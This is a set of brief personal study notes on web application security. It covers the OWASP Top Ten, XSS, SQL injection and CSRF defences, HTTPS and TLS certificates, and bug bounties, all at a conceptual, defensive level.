Web Security
- Assume the worst case *
- Exposed to threats
- Data theft/ destruction
- System attacks
- vulnerabilities
- defencsive using automated alerts
Attack Types
- Malicious code execution
- Cryptography attacks: hide secrets
- Data interception
- Denial of Service
owasp.org/www-project-top-ten/
OWASP Top Ten Web Application Security Risks | OWASP
The OWASP Top 10 is the reference standard for the most critical web application security risks. Adopting the OWASP Top 10 is perhaps the most effective first step towards changing your software development culture focused on producing secure code.
owasp.org
XSS
- Cross-Site Scripting: request from one domain to another domain
-> html entities - A type of injection
- Malicious scripts are injected into web sites
- scripts could be entered on any inputs
XSS Solutions
Escape/ Sanitiza all user inputs
Escape all the input before actually putting it on sensible places
XSS Protection Cheatsheet
SQL Injection
- just USE
Sequelize
- parameterized statements
- escaping user inputs
- privileges control
- SQL Injection Prevention Cheatsheet
CSRF
- Cross-Site Request Forgery
- forces a user to input st unauthorized
CSRF Solutions
- Identifying source origin
- access-control-allow-origin
- Synchronizer Tokens
HTTPS
- http is not safe, HTTPS is same with http over TLS
- only expose the host to a DNS server and the target IP
< Secured things >- path
- query
- payload
- every method
The Handshake
- negociation the certificate
Heroku / Let’s Encrypt
gives HTTP certificate for free
Hack Bounties
to test the security